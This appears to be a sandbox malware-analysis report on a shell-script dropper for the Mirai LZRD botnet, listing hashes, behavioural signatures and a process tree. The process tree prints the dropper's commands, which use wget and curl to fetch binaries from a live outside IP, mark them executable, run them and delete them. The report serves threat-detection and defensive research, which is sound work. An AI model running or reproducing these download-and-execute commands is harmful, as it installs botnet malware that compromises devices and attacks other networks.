Overview

overview

10

Static

static

1

4c6c8e440a...621.sh

ubuntu-18.04-amd64

10

4c6c8e440a...621.sh

debian-9-armhf

10

4c6c8e440a...621.sh

debian-9-mips

10

4c6c8e440a...621.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    165s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-11-2024 02:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh

  • Size

    1KB

  • MD5

    ea3e4ce3ad906187d77f71fd511caca5

  • SHA1

    1826d8941b0d1aaa76fdade685e66e31e3732399

  • SHA256

    4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621

  • SHA512

    e9ac3561d6872982e7647f162635fe522c9abca8ca686d2f4853f62ae099c9b4a9f43076fc8f96ce2fc17d2dc02eb10067d811db34dc039c9a8761457830d9f7

Score
10/10
mirailzrdantivmbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (18950) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
    /tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
    1⤵
    • Writes file to tmp directory
    PID:641
    • /usr/bin/wget
      wget http://154.216.20.149/bins/byte.x86
      2⤵
      • Writes file to tmp directory
      PID:643
    • /usr/bin/curl
      curl -O http://154.216.20.149/bins/byte.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:665
    • /bin/cat
      cat byte.x86
      2⤵
        PID:671
      • /bin/chmod
        chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.x86 systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-kyp3WQ
        2⤵
        • File and Directory Permissions Modification
        PID:672
      • /tmp/byte
        ./byte byte.dvr
        2⤵
        • Executes dropped EXE
        PID:673
      • /bin/rm
        rm -rf byte
        2⤵
          PID:675
        • /usr/bin/wget
          wget http://154.216.20.149/bins/byte.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:676
        • /usr/bin/curl
          curl -O http://154.216.20.149/bins/byte.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:679
        • /bin/cat
          cat byte.mips
          2⤵
          • System Network Configuration Discovery
          PID:690
        • /bin/chmod
          chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.mips byte.x86 systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-kyp3WQ
          2⤵
          • File and Directory Permissions Modification
          PID:691
        • /tmp/byte
          ./byte byte.dvr
          2⤵
          • Executes dropped EXE
          PID:693
        • /bin/rm
          rm -rf byte
          2⤵
            PID:695
          • /usr/bin/wget
            wget http://154.216.20.149/bins/byte.mpsl
            2⤵
            • Writes file to tmp directory
            PID:697
          • /usr/bin/curl
            curl -O http://154.216.20.149/bins/byte.mpsl
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:707
          • /bin/cat
            cat byte.mpsl
            2⤵
              PID:717
            • /bin/chmod
              chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.mips byte.mpsl byte.x86 systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-kyp3WQ
              2⤵
              • File and Directory Permissions Modification
              PID:718
            • /tmp/byte
              ./byte byte.dvr
              2⤵
              • Executes dropped EXE
              PID:720
            • /bin/rm
              rm -rf byte
              2⤵
                PID:722
              • /usr/bin/wget
                wget http://154.216.20.149/bins/byte.arm
                2⤵
                • Writes file to tmp directory
                PID:724
              • /usr/bin/curl
                curl -O http://154.216.20.149/bins/byte.arm
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:737
              • /bin/cat
                cat byte.arm
                2⤵
                  PID:739
                • /bin/chmod
                  chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.arm byte.mips byte.mpsl byte.x86 systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-kyp3WQ
                  2⤵
                  • File and Directory Permissions Modification
                  PID:740
                • /tmp/byte
                  ./byte byte.dvr
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Reads runtime system information
                  PID:741
                • /bin/rm
                  rm -rf byte
                  2⤵
                    PID:745

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/byte
                  Filesize

                  137KB

                  MD5

                  442269900f28ef10d8b7a13f2bc5ed86

                  SHA1

                  2f997966590600fb4b5572f306a40bcbb6fe79eb

                  SHA256

                  a1badb5317009fe55702c638b0c5816a92337e855e83db12e99e721db7b193c3

                  SHA512

                  d861babc3d83bf705aa5efd5276e928d6335eabfe58c604968315f865ae1765fe9b099b21de8045b3acfc6b66b5c384ec39888dd72d69bc4105703cff9e19db1

                  Download Submit

                • /tmp/byte
                  Filesize

                  137KB

                  MD5

                  973357b4367bf43c6f6cf45dac7c231b

                  SHA1

                  3040ad2b7b0943b5abb614780c1a43c7a3f3831c

                  SHA256

                  e35a1943ed7c2e95bb119671722cb8ea3d51810fe73a7e6950a4c8f3b8bdad33

                  SHA512

                  46dd2a46ab7cd95f2949b02f95d3706585457ceebad94e3a28fb4cfbc42f16cc31ef7e1f8cc2cf7e1a808a86eec2aae347be52526a96f0f17a1d566469f2cd94

                  Download Submit

                • /tmp/byte
                  Filesize

                  111KB

                  MD5

                  6d97a559bb573a412ca643940d604978

                  SHA1

                  dc3973c7589b052711338b8fe04f790cfa247738

                  SHA256

                  d60130d48610638895e18f2994a264cd7fbb0560c7b2f552fc1715f4dfed30e5

                  SHA512

                  73bf35b97b292f3ffd9e40ac1057836cc1c97a16465eb2730098f4e8d6081c179c6ea5221c552064b462f2026b078fe1a78a013c8bb743b897f2990d9522cae0

                  Download Submit

                • /tmp/byte.x86
                  Filesize

                  95KB

                  MD5

                  34ef09c6bfa12c8bb0a4eb1111163f49

                  SHA1

                  374e5712df7fba870afd7c7897c5bc23ba205f61

                  SHA256

                  537907609ffc903d04b1aa5309d9bd02b95a31f343763ae83cd61f9c1b797438

                  SHA512

                  4aecdc6165268aa3a214581b5bb1311ebd17b9a7f573fc45a914fd3c1b7c38faffbe7ca21628ca37752417c8270a66fa34d544a4e315271f462dd31953bd902f

                  Download Submit